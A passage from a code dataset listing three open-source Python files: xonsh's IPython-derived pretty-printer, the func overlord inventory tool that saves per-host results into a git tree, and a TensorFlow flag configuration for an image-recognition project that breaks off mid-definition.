repo_name | path | copies | size | content | license | hash | line_mean | line_max | alpha_frac | autogenerated
---|---|---|---|---|---|---|---|---|---|---
szlin/gitsome | xonsh/pretty.py | 1 | 27713 | # -*- coding: utf-8 -*-
"""
Python advanced pretty printer. This pretty printer is intended to
replace the old `pprint` python module which does not allow developers
to provide their own pretty print callbacks.
This module is based on ruby's `prettyprint.rb` library by `Tanaka Akira`.
The following implementations were forked from the IPython project:
* Copyright (c) 2008-2014, IPython Development Team
* Copyright (C) 2001-2007 Fernando Perez <[email protected]>
* Copyright (c) 2001, Janko Hauser <[email protected]>
* Copyright (c) 2001, Nathaniel Gray <[email protected]>
Example Usage
-------------
To directly print the representation of an object use `pprint`::
from pretty import pprint
pprint(complex_object)
To get a string of the output use `pretty`::
from pretty import pretty
string = pretty(complex_object)
Extending
---------
The pretty library allows developers to add pretty printing rules for their
own objects. This process is straightforward. All you have to do is to
add a `_repr_pretty_` method to your object and call the methods on the
pretty printer passed::
class MyObject(object):
def _repr_pretty_(self, p, cycle):
...
Here is an example implementation of a `_repr_pretty_` method for a list
subclass::
class MyList(list):
def _repr_pretty_(self, p, cycle):
if cycle:
p.text('MyList(...)')
else:
with p.group(8, 'MyList([', '])'):
for idx, item in enumerate(self):
if idx:
p.text(',')
p.breakable()
p.pretty(item)
The `cycle` parameter is `True` if pretty detected a cycle. You *have* to
react to that or the result is an infinite loop. `p.text()` just adds
non-breaking text to the output, `p.breakable()` either adds whitespace
or breaks here. If you pass it an argument it's used instead of the
default space. `p.pretty` prettyprints another object using the pretty print
method.
The first parameter to the `group` function specifies the extra indentation
of the next line. In this example the next item will either be on the same
line (if the items are short enough) or aligned with the right edge of the
opening bracket of `MyList`.
If you just want to indent something you can use the group function
without open / close parameters. You can also use this code::
with p.indent(2):
...
Inheritance diagram:
.. inheritance-diagram:: IPython.lib.pretty
:parts: 3
:copyright: 2007 by Armin Ronacher.
Portions (c) 2009 by Robert Kern.
:license: BSD License.
"""
from contextlib import contextmanager
import sys
import types
import re
import datetime
from collections import deque
# from IPython.utils.py3compat import PY3, cast_unicode
# from IPython.utils.encoding import get_stream_enc
from io import StringIO
__all__ = ['pretty', 'pprint', 'PrettyPrinter', 'RepresentationPrinter',
'for_type', 'for_type_by_name']
MAX_SEQ_LENGTH = 1000
_re_pattern_type = type(re.compile(''))
def _safe_getattr(obj, attr, default=None):
"""Safe version of getattr.
Same as getattr, but will return ``default`` on any Exception,
rather than raising.
"""
try:
return getattr(obj, attr, default)
except Exception:
return default
# if PY3:
CUnicodeIO = StringIO
# else:
# class CUnicodeIO(StringIO):
# """StringIO that casts str to unicode on Python 2"""
# def write(self, text):
# return super(CUnicodeIO, self).write(
# cast_unicode(text, encoding=get_stream_enc(sys.stdout)))
def pretty(obj, verbose=False, max_width=79, newline='\n', max_seq_length=MAX_SEQ_LENGTH):
"""
Pretty print the object's representation.
"""
stream = CUnicodeIO()
printer = RepresentationPrinter(stream, verbose, max_width, newline, max_seq_length)
printer.pretty(obj)
printer.flush()
return stream.getvalue()
def pprint(obj, verbose=False, max_width=79, newline='\n', max_seq_length=MAX_SEQ_LENGTH):
"""
Like `pretty` but print to stdout.
"""
printer = RepresentationPrinter(sys.stdout, verbose, max_width, newline, max_seq_length)
printer.pretty(obj)
printer.flush()
sys.stdout.write(newline)
sys.stdout.flush()
class _PrettyPrinterBase(object):
@contextmanager
def indent(self, indent):
"""with statement support for indenting/dedenting."""
self.indentation += indent
try:
yield
finally:
self.indentation -= indent
@contextmanager
def group(self, indent=0, gopen='', gclose=''):
"""like begin_group / end_group but for the with statement."""
self.begin_group(indent, gopen)
try:
yield
finally:
self.end_group(indent, gclose)
class PrettyPrinter(_PrettyPrinterBase):
"""
Base class for the `RepresentationPrinter` prettyprinter that is used to
generate pretty reprs of objects. Unlike the `RepresentationPrinter`,
this printer knows nothing about the default pprinters or the `_repr_pretty_`
callback method.
"""
def __init__(self, output, max_width=79, newline='\n', max_seq_length=MAX_SEQ_LENGTH):
self.output = output
self.max_width = max_width
self.newline = newline
self.max_seq_length = max_seq_length
self.output_width = 0
self.buffer_width = 0
self.buffer = deque()
root_group = Group(0)
self.group_stack = [root_group]
self.group_queue = GroupQueue(root_group)
self.indentation = 0
def _break_outer_groups(self):
while self.max_width < self.output_width + self.buffer_width:
group = self.group_queue.deq()
if not group:
return
while group.breakables:
x = self.buffer.popleft()
self.output_width = x.output(self.output, self.output_width)
self.buffer_width -= x.width
while self.buffer and isinstance(self.buffer[0], Text):
x = self.buffer.popleft()
self.output_width = x.output(self.output, self.output_width)
self.buffer_width -= x.width
def text(self, obj):
"""Add literal text to the output."""
width = len(obj)
if self.buffer:
text = self.buffer[-1]
if not isinstance(text, Text):
text = Text()
self.buffer.append(text)
text.add(obj, width)
self.buffer_width += width
self._break_outer_groups()
else:
self.output.write(obj)
self.output_width += width
def breakable(self, sep=' '):
"""
Add a breakable separator to the output. This does not mean that it
will automatically break here. If no break takes place at this position
the `sep` is inserted, which defaults to one space.
"""
width = len(sep)
group = self.group_stack[-1]
if group.want_break:
self.flush()
self.output.write(self.newline)
self.output.write(' ' * self.indentation)
self.output_width = self.indentation
self.buffer_width = 0
else:
self.buffer.append(Breakable(sep, width, self))
self.buffer_width += width
self._break_outer_groups()
def break_(self):
"""
Explicitly insert a newline into the output, maintaining correct indentation.
"""
self.flush()
self.output.write(self.newline)
self.output.write(' ' * self.indentation)
self.output_width = self.indentation
self.buffer_width = 0
def begin_group(self, indent=0, gopen=''):
"""
Begin a group. If you want support for python < 2.5 which doesn't have
the with statement this is the preferred way:
p.begin_group(1, '{')
...
p.end_group(1, '}')
The python 2.5 expression would be this:
with p.group(1, '{', '}'):
...
The first parameter specifies the indentation for the next line (usually
the width of the opening text), the second the opening text. All
parameters are optional.
"""
if gopen:
self.text(gopen)
group = Group(self.group_stack[-1].depth + 1)
self.group_stack.append(group)
self.group_queue.enq(group)
self.indentation += indent
def _enumerate(self, seq):
"""like enumerate, but with an upper limit on the number of items"""
for idx, x in enumerate(seq):
if self.max_seq_length and idx >= self.max_seq_length:
self.text(',')
self.breakable()
self.text('...')
return  # PEP 479: a plain return ends the generator; raising StopIteration would become RuntimeError on Python 3.7+
yield idx, x
def end_group(self, dedent=0, gclose=''):
"""End a group. See `begin_group` for more details."""
self.indentation -= dedent
group = self.group_stack.pop()
if not group.breakables:
self.group_queue.remove(group)
if gclose:
self.text(gclose)
def flush(self):
"""Flush data that is left in the buffer."""
for data in self.buffer:
self.output_width += data.output(self.output, self.output_width)
self.buffer.clear()
self.buffer_width = 0
def _get_mro(obj_class):
""" Get a reasonable method resolution order of a class and its superclasses
for both old-style and new-style classes.
"""
if not hasattr(obj_class, '__mro__'):
# Old-style class. Mix in object to make a fake new-style class.
try:
obj_class = type(obj_class.__name__, (obj_class, object), {})
except TypeError:
# Old-style extension type that does not descend from object.
# FIXME: try to construct a more thorough MRO.
mro = [obj_class]
else:
mro = obj_class.__mro__[1:-1]
else:
mro = obj_class.__mro__
return mro
class RepresentationPrinter(PrettyPrinter):
"""
Special pretty printer that has a `pretty` method that calls the pretty
printer for a python object.
This class stores processing data on `self` so you must *never* use
this class in a threaded environment. Always lock it or reinstantiate
it.
Instances also have a verbose flag callbacks can access to control their
output. For example the default instance repr prints all attributes and
methods that are not prefixed by an underscore if the printer is in
verbose mode.
"""
def __init__(self, output, verbose=False, max_width=79, newline='\n',
singleton_pprinters=None, type_pprinters=None, deferred_pprinters=None,
max_seq_length=MAX_SEQ_LENGTH):
PrettyPrinter.__init__(self, output, max_width, newline, max_seq_length=max_seq_length)
self.verbose = verbose
self.stack = []
if singleton_pprinters is None:
singleton_pprinters = _singleton_pprinters.copy()
self.singleton_pprinters = singleton_pprinters
if type_pprinters is None:
type_pprinters = _type_pprinters.copy()
self.type_pprinters = type_pprinters
if deferred_pprinters is None:
deferred_pprinters = _deferred_type_pprinters.copy()
self.deferred_pprinters = deferred_pprinters
def pretty(self, obj):
"""Pretty print the given object."""
obj_id = id(obj)
cycle = obj_id in self.stack
self.stack.append(obj_id)
self.begin_group()
try:
obj_class = _safe_getattr(obj, '__class__', None) or type(obj)
# First try to find registered singleton printers for the type.
try:
printer = self.singleton_pprinters[obj_id]
except (TypeError, KeyError):
pass
else:
return printer(obj, self, cycle)
# Next walk the mro and check for either:
# 1) a registered printer
# 2) a _repr_pretty_ method
for cls in _get_mro(obj_class):
if cls in self.type_pprinters:
# printer registered in self.type_pprinters
return self.type_pprinters[cls](obj, self, cycle)
else:
# deferred printer
printer = self._in_deferred_types(cls)
if printer is not None:
return printer(obj, self, cycle)
else:
# Finally look for special method names.
# Some objects automatically create any requested
# attribute. Try to ignore most of them by checking for
# callability.
if '_repr_pretty_' in cls.__dict__:
meth = cls._repr_pretty_
if callable(meth):
return meth(obj, self, cycle)
return _default_pprint(obj, self, cycle)
finally:
self.end_group()
self.stack.pop()
def _in_deferred_types(self, cls):
"""
Check if the given class is specified in the deferred type registry.
Returns the printer from the registry if it exists, and None if the
class is not in the registry. Successful matches will be moved to the
regular type registry for future use.
"""
mod = _safe_getattr(cls, '__module__', None)
name = _safe_getattr(cls, '__name__', None)
key = (mod, name)
printer = None
if key in self.deferred_pprinters:
# Move the printer over to the regular registry.
printer = self.deferred_pprinters.pop(key)
self.type_pprinters[cls] = printer
return printer
class Printable(object):
def output(self, stream, output_width):
return output_width
class Text(Printable):
def __init__(self):
self.objs = []
self.width = 0
def output(self, stream, output_width):
for obj in self.objs:
stream.write(obj)
return output_width + self.width
def add(self, obj, width):
self.objs.append(obj)
self.width += width
class Breakable(Printable):
def __init__(self, seq, width, pretty):
self.obj = seq
self.width = width
self.pretty = pretty
self.indentation = pretty.indentation
self.group = pretty.group_stack[-1]
self.group.breakables.append(self)
def output(self, stream, output_width):
self.group.breakables.popleft()
if self.group.want_break:
stream.write(self.pretty.newline)
stream.write(' ' * self.indentation)
return self.indentation
if not self.group.breakables:
self.pretty.group_queue.remove(self.group)
stream.write(self.obj)
return output_width + self.width
class Group(Printable):
def __init__(self, depth):
self.depth = depth
self.breakables = deque()
self.want_break = False
class GroupQueue(object):
def __init__(self, *groups):
self.queue = []
for group in groups:
self.enq(group)
def enq(self, group):
depth = group.depth
while depth > len(self.queue) - 1:
self.queue.append([])
self.queue[depth].append(group)
def deq(self):
for stack in self.queue:
for idx, group in enumerate(reversed(stack)):
if group.breakables:
del stack[idx]
group.want_break = True
return group
for group in stack:
group.want_break = True
del stack[:]
def remove(self, group):
try:
self.queue[group.depth].remove(group)
except ValueError:
pass
try:
_baseclass_reprs = (object.__repr__, types.InstanceType.__repr__)
except AttributeError: # Python 3
_baseclass_reprs = (object.__repr__,)
def _default_pprint(obj, p, cycle):
"""
The default print function. Used if an object does not provide one and
it's none of the builtin objects.
"""
klass = _safe_getattr(obj, '__class__', None) or type(obj)
if _safe_getattr(klass, '__repr__', None) not in _baseclass_reprs:
# A user-provided repr. Find newlines and replace them with p.break_()
_repr_pprint(obj, p, cycle)
return
p.begin_group(1, '<')
p.pretty(klass)
p.text(' at 0x%x' % id(obj))
if cycle:
p.text(' ...')
elif p.verbose:
first = True
for key in dir(obj):
if not key.startswith('_'):
try:
value = getattr(obj, key)
except AttributeError:
continue
if isinstance(value, types.MethodType):
continue
if not first:
p.text(',')
p.breakable()
p.text(key)
p.text('=')
step = len(key) + 1
p.indentation += step
p.pretty(value)
p.indentation -= step
first = False
p.end_group(1, '>')
def _seq_pprinter_factory(start, end, basetype):
"""
Factory that returns a pprint function useful for sequences. Used by
the default pprint for tuples and lists.
"""
def inner(obj, p, cycle):
typ = type(obj)
if basetype is not None and typ is not basetype and typ.__repr__ != basetype.__repr__:
# If the subclass provides its own repr, use it instead.
return p.text(typ.__repr__(obj))
if cycle:
return p.text(start + '...' + end)
step = len(start)
p.begin_group(step, start)
for idx, x in p._enumerate(obj):
if idx:
p.text(',')
p.breakable()
p.pretty(x)
if len(obj) == 1 and type(obj) is tuple:
# Special case for 1-item tuples.
p.text(',')
p.end_group(step, end)
return inner
def _set_pprinter_factory(start, end, basetype):
"""
Factory that returns a pprint function useful for sets and frozensets.
"""
def inner(obj, p, cycle):
typ = type(obj)
if basetype is not None and typ is not basetype and typ.__repr__ != basetype.__repr__:
# If the subclass provides its own repr, use it instead.
return p.text(typ.__repr__(obj))
if cycle:
return p.text(start + '...' + end)
if len(obj) == 0:
# Special case.
p.text(basetype.__name__ + '()')
else:
step = len(start)
p.begin_group(step, start)
# Like dictionary keys, we will try to sort the items if there aren't too many
items = obj
if not (p.max_seq_length and len(obj) >= p.max_seq_length):
try:
items = sorted(obj)
except Exception:
# Sometimes the items don't sort.
pass
for idx, x in p._enumerate(items):
if idx:
p.text(',')
p.breakable()
p.pretty(x)
p.end_group(step, end)
return inner
def _dict_pprinter_factory(start, end, basetype=None):
"""
Factory that returns a pprint function used by the default pprint of
dicts and dict proxies.
"""
def inner(obj, p, cycle):
typ = type(obj)
if basetype is not None and typ is not basetype and typ.__repr__ != basetype.__repr__:
# If the subclass provides its own repr, use it instead.
return p.text(typ.__repr__(obj))
if cycle:
return p.text('{...}')
p.begin_group(1, start)
keys = obj.keys()
# if dict isn't large enough to be truncated, sort keys before displaying
if not (p.max_seq_length and len(obj) >= p.max_seq_length):
try:
keys = sorted(keys)
except Exception:
# Sometimes the keys don't sort.
pass
for idx, key in p._enumerate(keys):
if idx:
p.text(',')
p.breakable()
p.pretty(key)
p.text(': ')
p.pretty(obj[key])
p.end_group(1, end)
return inner
def _super_pprint(obj, p, cycle):
"""The pprint for the super type."""
p.begin_group(8, '<super: ')
p.pretty(obj.__thisclass__)
p.text(',')
p.breakable()
p.pretty(obj.__self__)
p.end_group(8, '>')
def _re_pattern_pprint(obj, p, cycle):
"""The pprint function for regular expression patterns."""
p.text('re.compile(')
pattern = repr(obj.pattern)
if pattern[:1] in 'uU':
pattern = pattern[1:]
prefix = 'ur'
else:
prefix = 'r'
pattern = prefix + pattern.replace('\\\\', '\\')
p.text(pattern)
if obj.flags:
p.text(',')
p.breakable()
done_one = False
for flag in ('TEMPLATE', 'IGNORECASE', 'LOCALE', 'MULTILINE', 'DOTALL',
'UNICODE', 'VERBOSE', 'DEBUG'):
if obj.flags & getattr(re, flag):
if done_one:
p.text('|')
p.text('re.' + flag)
done_one = True
p.text(')')
def _type_pprint(obj, p, cycle):
"""The pprint for classes and types."""
# Heap allocated types might not have the module attribute,
# and others may set it to None.
# Checks for a __repr__ override in the metaclass
if type(obj).__repr__ is not type.__repr__:
_repr_pprint(obj, p, cycle)
return
mod = _safe_getattr(obj, '__module__', None)
name = _safe_getattr(obj, '__qualname__', obj.__name__)
if mod in (None, '__builtin__', 'builtins', 'exceptions'):
p.text(name)
else:
p.text(mod + '.' + name)
def _repr_pprint(obj, p, cycle):
"""A pprint that just redirects to the normal repr function."""
# Find newlines and replace them with p.break_()
output = repr(obj)
for idx, output_line in enumerate(output.splitlines()):
if idx:
p.break_()
p.text(output_line)
def _function_pprint(obj, p, cycle):
"""Base pprint for all functions and builtin functions."""
name = _safe_getattr(obj, '__qualname__', obj.__name__)
mod = obj.__module__
if mod and mod not in ('__builtin__', 'builtins', 'exceptions'):
name = mod + '.' + name
p.text('<function %s>' % name)
def _exception_pprint(obj, p, cycle):
"""Base pprint for all exceptions."""
name = getattr(obj.__class__, '__qualname__', obj.__class__.__name__)
if obj.__class__.__module__ not in ('exceptions', 'builtins'):
name = '%s.%s' % (obj.__class__.__module__, name)
step = len(name) + 1
p.begin_group(step, name + '(')
for idx, arg in enumerate(getattr(obj, 'args', ())):
if idx:
p.text(',')
p.breakable()
p.pretty(arg)
p.end_group(step, ')')
#: the exception base
try:
_exception_base = BaseException
except NameError:
_exception_base = Exception
#: printers for builtin types
_type_pprinters = {
int: _repr_pprint,
float: _repr_pprint,
str: _repr_pprint,
tuple: _seq_pprinter_factory('(', ')', tuple),
list: _seq_pprinter_factory('[', ']', list),
dict: _dict_pprinter_factory('{', '}', dict),
set: _set_pprinter_factory('{', '}', set),
frozenset: _set_pprinter_factory('frozenset({', '})', frozenset),
super: _super_pprint,
_re_pattern_type: _re_pattern_pprint,
type: _type_pprint,
types.FunctionType: _function_pprint,
types.BuiltinFunctionType: _function_pprint,
types.MethodType: _repr_pprint,
datetime.datetime: _repr_pprint,
datetime.timedelta: _repr_pprint,
_exception_base: _exception_pprint
}
try:
_type_pprinters[types.DictProxyType] = _dict_pprinter_factory('<dictproxy {', '}>')
_type_pprinters[types.ClassType] = _type_pprint
_type_pprinters[types.SliceType] = _repr_pprint
except AttributeError: # Python 3
_type_pprinters[slice] = _repr_pprint
try:
_type_pprinters[xrange] = _repr_pprint
_type_pprinters[long] = _repr_pprint
_type_pprinters[unicode] = _repr_pprint
except NameError:
_type_pprinters[range] = _repr_pprint
_type_pprinters[bytes] = _repr_pprint
#: printers for types specified by name
_deferred_type_pprinters = {
}
def for_type(typ, func):
"""
Add a pretty printer for a given type.
"""
oldfunc = _type_pprinters.get(typ, None)
if func is not None:
# To support easy restoration of old pprinters, we need to ignore Nones.
_type_pprinters[typ] = func
return oldfunc
def for_type_by_name(type_module, type_name, func):
"""
Add a pretty printer for a type specified by the module and name of a type
rather than the type object itself.
"""
key = (type_module, type_name)
oldfunc = _deferred_type_pprinters.get(key, None)
if func is not None:
# To support easy restoration of old pprinters, we need to ignore Nones.
_deferred_type_pprinters[key] = func
return oldfunc
#: printers for the default singletons
_singleton_pprinters = dict.fromkeys(map(id, [None, True, False, Ellipsis,
NotImplemented]), _repr_pprint)
def _defaultdict_pprint(obj, p, cycle):
name = 'defaultdict'
with p.group(len(name) + 1, name + '(', ')'):
if cycle:
p.text('...')
else:
p.pretty(obj.default_factory)
p.text(',')
p.breakable()
p.pretty(dict(obj))
def _ordereddict_pprint(obj, p, cycle):
name = 'OrderedDict'
with p.group(len(name) + 1, name + '(', ')'):
if cycle:
p.text('...')
elif len(obj):
p.pretty(list(obj.items()))
def _deque_pprint(obj, p, cycle):
name = 'deque'
with p.group(len(name) + 1, name + '(', ')'):
if cycle:
p.text('...')
else:
p.pretty(list(obj))
def _counter_pprint(obj, p, cycle):
name = 'Counter'
with p.group(len(name) + 1, name + '(', ')'):
if cycle:
p.text('...')
elif len(obj):
p.pretty(dict(obj))
for_type_by_name('collections', 'defaultdict', _defaultdict_pprint)
for_type_by_name('collections', 'OrderedDict', _ordereddict_pprint)
for_type_by_name('collections', 'deque', _deque_pprint)
for_type_by_name('collections', 'Counter', _counter_pprint)
if __name__ == '__main__':
from random import randrange
class Foo(object):
def __init__(self):
self.foo = 1
self.bar = re.compile(r'\s+')
self.blub = dict.fromkeys(range(30), randrange(1, 40))
self.hehe = 23424.234234
self.list = ["blub", "blah", self]
def get_foo(self):
print("foo")
pprint(Foo(), verbose=True)
| gpl-3.0 | 1,760,497,032,878,910,500 | 31.337223 | 95 | 0.567062 | false |
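A minimal usage sketch for the `xonsh/pretty.py` row above; the import path follows the row's location in gitsome, and the `Point` class is invented purely for illustration:

```python
from xonsh import pretty  # assumed importable from the path shown in the row

class Point(object):
    # Toy class implementing the _repr_pretty_ protocol from the docstring above.
    def __init__(self, x, y):
        self.x, self.y = x, y

    def _repr_pretty_(self, p, cycle):
        if cycle:                      # True when the printer detected a reference cycle
            p.text('Point(...)')
        else:
            with p.group(6, 'Point(', ')'):
                p.pretty(self.x)
                p.text(',')
                p.breakable()          # a space, or a line break when the line is full
                p.pretty(self.y)

print(pretty.pretty(Point(1, 2)))      # -> Point(1, 2)
pretty.pprint([Point(n, n) for n in range(20)])   # wraps at the default max_width=79

# A printer can also be registered without touching the class:
pretty.for_type(complex, lambda obj, p, cycle: p.text('<%r>' % obj))
pretty.pprint(1 + 2j)                  # -> <(1+2j)>
```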
pombredanne/func | func/overlord/inventory.py | 1 | 6796 | ##
## func inventory app.
## use func to collect inventory data on anything, yes, anything
##
## Copyright 2007, Red Hat, Inc
## Michael DeHaan <[email protected]>
## +AUTHORS
##
## This software may be freely redistributed under the terms of the GNU
## general public license.
##
## You should have received a copy of the GNU General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
##
import os.path
import time
import optparse
import sys
import pprint
import xmlrpclib
from func.minion import sub_process
import func.overlord.client as func_client
import func.utils as utils
DEFAULT_TREE = "/var/lib/func/inventory/"
class FuncInventory(object):
def __init__(self):
pass
def run(self,args):
p = optparse.OptionParser()
p.add_option("-v", "--verbose",
dest="verbose",
action="store_true",
help="provide extra output")
p.add_option("-s", "--server-spec",
dest="server_spec",
default="*",
help="run against specific servers, default: '*'")
p.add_option("-m", "--methods",
dest="methods",
default="inventory",
help="run inventory only on certain function names, default: 'inventory'")
p.add_option("-M", "--modules",
dest="modules",
default="all",
help="run inventory only on certain module names, default: 'all'")
p.add_option("-t", "--tree",
dest="tree",
default=DEFAULT_TREE,
help="output results tree here, default: %s" % DEFAULT_TREE)
p.add_option("-n", "--no-git",
dest="nogit",
action="store_true",
help="disable useful change tracking features")
p.add_option("-x", "--xmlrpc", dest="xmlrpc",
help="output data using XMLRPC format",
action="store_true")
p.add_option("-j", "--json", dest="json",
help="output data using JSON",
action="store_true")
(options, args) = p.parse_args(args)
self.options = options
filtered_module_list = options.modules.split(",")
filtered_function_list = options.methods.split(",")
self.git_setup(options)
# see what modules each host provides (as well as what hosts we have)
host_methods = func_client.Overlord(options.server_spec).system.list_methods()
# call all remote info methods and handle them
if options.verbose:
print "- scanning ..."
# for (host, modules) in host_modules.iteritems():
for (host, methods) in host_methods.iteritems():
if utils.is_error(methods):
print "-- connection refused: %s" % host
break
for each_method in methods:
#if type(each_method) == int:
# if self.options.verbose:
# print "-- connection refused: %s" % host
# break
tokens = each_method.split(".")
module_name = ".".join(tokens[:-1])
method_name = tokens[-1]
if not "all" in filtered_module_list and not module_name in filtered_module_list:
continue
if not "all" in filtered_function_list and not method_name in filtered_function_list:
continue
overlord = func_client.Overlord(host,noglobs=True) # ,noglobs=True)
results = getattr(getattr(overlord,module_name),method_name)()
if self.options.verbose:
print "-- %s: running: %s %s" % (host, module_name, method_name)
self.save_results(options, host, module_name, method_name, results)
self.git_update(options)
return 1
def format_return(self, data):
"""
The call module supports multiple output return types; the default is pprint.
"""
# special case... if the return is a string, just print it straight
if type(data) == str:
return data
if self.options.xmlrpc:
return xmlrpclib.dumps((data,""))
if self.options.json:
try:
import simplejson
return simplejson.dumps(data)
except ImportError:
print "ERROR: json support not found, install python-simplejson"
sys.exit(1)
return pprint.pformat(data)
# FUTURE: skvidal points out that guest symlinking would be an interesting feature
def save_results(self, options, host_name, module_name, method_name, results):
dirname = os.path.join(options.tree, host_name, module_name)
if not os.path.exists(dirname):
os.makedirs(dirname)
filename = os.path.join(dirname, method_name)
results_file = open(filename,"w+")
data = self.format_return(results)
results_file.write(data)
results_file.close()
def git_setup(self,options):
if options.nogit:
return
if not os.path.exists("/usr/bin/git"):
print "git-core is not installed, so no change tracking is available."
print "use --no-git or, better, just install it."
sys.exit(411)
if not os.path.exists(options.tree):
os.makedirs(options.tree)
dirname = os.path.join(options.tree, ".git")
if not os.path.exists(dirname):
if options.verbose:
print "- initializing git repo: %s" % options.tree
cwd = os.getcwd()
os.chdir(options.tree)
rc1 = sub_process.call(["/usr/bin/git", "init"], shell=False)
# FIXME: check rc's
os.chdir(cwd)
else:
if options.verbose:
print "- git already initialized: %s" % options.tree
def git_update(self,options):
if options.nogit:
return
else:
if options.verbose:
print "- updating git"
mytime = time.asctime()
cwd = os.getcwd()
os.chdir(options.tree)
rc1 = sub_process.call(["/usr/bin/git", "add", "*" ], shell=False)
rc2 = sub_process.call(["/usr/bin/git", "commit", "-a", "-m", "Func-inventory update: %s" % mytime], shell=False)
# FIXME: check rc's
os.chdir(cwd)
if __name__ == "__main__":
inv = FuncInventory()
inv.run(sys.argv)
| gpl-2.0 | 2,945,001,256,754,425,000 | 34.581152 | 121 | 0.543996 | false |
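An illustrative way to drive the inventory app above from Python rather than the command line (Python 2, like the module itself); the server spec and output tree are placeholder values, and a reachable func overlord/minion setup is assumed:

```python
from func.overlord.inventory import FuncInventory

inv = FuncInventory()
# These are the same options the optparse block above defines.
inv.run(["--server-spec", "web*",
         "--methods", "inventory,hardware",
         "--tree", "/tmp/func-tree/",
         "--no-git",
         "--verbose"])
```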
NicolasPresta/ReconoBook | config.py | 1 | 8342 | # coding=utf-8
# ==============================================================================
import tensorflow as tf
# ==============================================================================
FLAGS = tf.app.flags.FLAGS
# ==============================================================================
# -------------------------------- DIRECTORIES --------------------------------
tf.app.flags.DEFINE_string('summary_dir_eval', './summary_eval', "Logs de proceso de evaluación")
tf.app.flags.DEFINE_string('summary_dir_train', './summary_train', "Logs de proceso de entrenamiento")
tf.app.flags.DEFINE_string('checkpoint_dir', './checkpoints', "Resguardo del modelo a utilizar")
tf.app.flags.DEFINE_string('datasets_dir', './datasets', 'Directorio donde están las imagenes a utilizar')
tf.app.flags.DEFINE_string('img_dir', './imagenes_jpg', 'Directorio donde están las imagenes a utilizar')
tf.app.flags.DEFINE_string('manual_test_folder', './manual_test_img/', 'Directorio con imagenes a evaluar manualmente')
tf.app.flags.DEFINE_string('data_split_dir', './split_jpg', 'Directorio donde estan las imagenes divididas a utilizar')
tf.app.flags.DEFINE_string('train_folder', 'train', 'Nombre directorio con las imagenes de entrenamiento')
tf.app.flags.DEFINE_string('validation_folder', 'validation', 'Nombre Directorio con las imagenes de validation')
tf.app.flags.DEFINE_string('test_folder', 'test', 'Nombre Directorio con las imagenes de test')
tf.app.flags.DEFINE_string('labels_file_name', 'labels.txt', 'Labels file')
tf.app.flags.DEFINE_string('export_model_dir', './export_model/', 'Carpeta donde se exporta el modelo')
# -------------------------------- DATASET --------------------------------
tf.app.flags.DEFINE_integer('porcentaje_img_validation', 20, 'Porcentaje de imagenes que van al set de validation')
tf.app.flags.DEFINE_integer('cantidad_clases', 20, 'Cantidad de clases a reconocer')
tf.app.flags.DEFINE_boolean('modo_procesar', False, 'Al ejecutar analize_jpg realizar emparejamiento')
tf.app.flags.DEFINE_integer('img_por_captura', 110, 'Cantidad de imagenes a conservar por captura')
tf.app.flags.DEFINE_string('capturas_id', 'A,B,C,D,E,F', 'Ids de todas las capturas realizadas')
tf.app.flags.DEFINE_string('capturasEntrenamiento_id', 'A,C,D,E,F', 'Ids de todas las capturas para entrenar')
tf.app.flags.DEFINE_string('capturasTest_id', 'B', 'Ids de todas las capturas para test')
tf.app.flags.DEFINE_integer('train_shards', 1, 'Numero de particiones del dataset de entrenamiento')
tf.app.flags.DEFINE_integer('validation_shards', 1, 'Numero de particiones del dataset de validación')
tf.app.flags.DEFINE_integer('test_shards', 1, 'Numero de particiones del dataset de entrenamiento')
tf.app.flags.DEFINE_integer('dataset_num_threads', 1, 'Numero de hilos de ejecución para armar el dataset')
# -------------------------------- INPUT --------------------------------
tf.app.flags.DEFINE_integer('input_num_preprocess_threads', 2, 'Numero de hilos que hacen el preprocesado')
tf.app.flags.DEFINE_integer('input_num_readers', 2, 'Numero de readers')
tf.app.flags.DEFINE_integer('image_height', 40, 'Alto imagen')
tf.app.flags.DEFINE_integer('image_width', 40, 'Ancho imagen')
# -------------------------------- MODEL --------------------------------
tf.app.flags.DEFINE_integer('model_cant_kernels1', 30, 'Cantidad de kernels de convolución en la capa 1')
tf.app.flags.DEFINE_integer('model_cant_kernels2', 60, 'Cantidad de kernels de convolución en la capa 2')
tf.app.flags.DEFINE_integer('model_cant_fc1', 125, 'Cantidad de neurolas full conected en capa 3')
tf.app.flags.DEFINE_integer('model_version', 1, 'Versión del modelo')
# -------------------------------- TRAINING --------------------------------
tf.app.flags.DEFINE_float("moving_average_decay", 0.9999, "The decay to use for the moving average.")
tf.app.flags.DEFINE_float("initial_learning_rate", 0.09, "Initial learning rate.")
tf.app.flags.DEFINE_integer("decay_steps", 1000, "Epochs after which learning rate decays.")
tf.app.flags.DEFINE_float("decay_rate", 0.95, "Learning rate decay factor.")
tf.app.flags.DEFINE_boolean('log_device_placement', False, "Si logea la ubicación de variables al inciar la ejecución")
tf.app.flags.DEFINE_boolean('allow_soft_placement', True, "Si permite una asignación de variables flexible")
tf.app.flags.DEFINE_boolean('train_distort', True, "Distorcionar imagenes al evaluar")
tf.app.flags.DEFINE_boolean('train_crop', True, "Distorcionar imagenes al evaluar")
tf.app.flags.DEFINE_integer('train_max_steps', 1000000, "Number of batches to run.")
tf.app.flags.DEFINE_integer("train_batch_size", 256, "Cantidad de imagenes que se procesan por batch")
tf.app.flags.DEFINE_integer("steps_to_imprimir_avance", 50, "Cantidad de pasos cada los cuales se imprimer por consola")
tf.app.flags.DEFINE_integer("steps_to_guardar_summary", 50, "Cantidad de pasos cada los cuales se guarda summary")
tf.app.flags.DEFINE_integer("steps_to_guardar_checkpoint", 500, "Cantidad de pasos cada los cuales se guarda checkpoint")
tf.app.flags.DEFINE_integer("saver_max_to_keep", 50, "Cantidad de checkouts a concervar")
tf.app.flags.DEFINE_boolean('use_dropout_1', False, "Si usa drop out en capa 1")
tf.app.flags.DEFINE_boolean('use_dropout_2', False, "Si usa drop out en capa 2")
tf.app.flags.DEFINE_boolean('use_dropout_3', False, "Si usa drop out en capa 3")
tf.app.flags.DEFINE_boolean('use_dropout_4', False, "Si usa drop out en capa 4")
tf.app.flags.DEFINE_float("keep_drop_prob", 0.5, "probabilidad de quedar en el drop out")
tf.app.flags.DEFINE_float("initializer_stddev", 0.004, "desviación estandar con la que se inician las variables")
tf.app.flags.DEFINE_float("variable_wd", 0.0004, "weight decay de las variables, regularización")
tf.app.flags.DEFINE_string('optimezer', 'GradientDescentOptimizer', 'Optimizador a usar: '
'GradientDescentOptimizer, '
'AdamOptimizer, '
'AdadeltaOptimizer, '
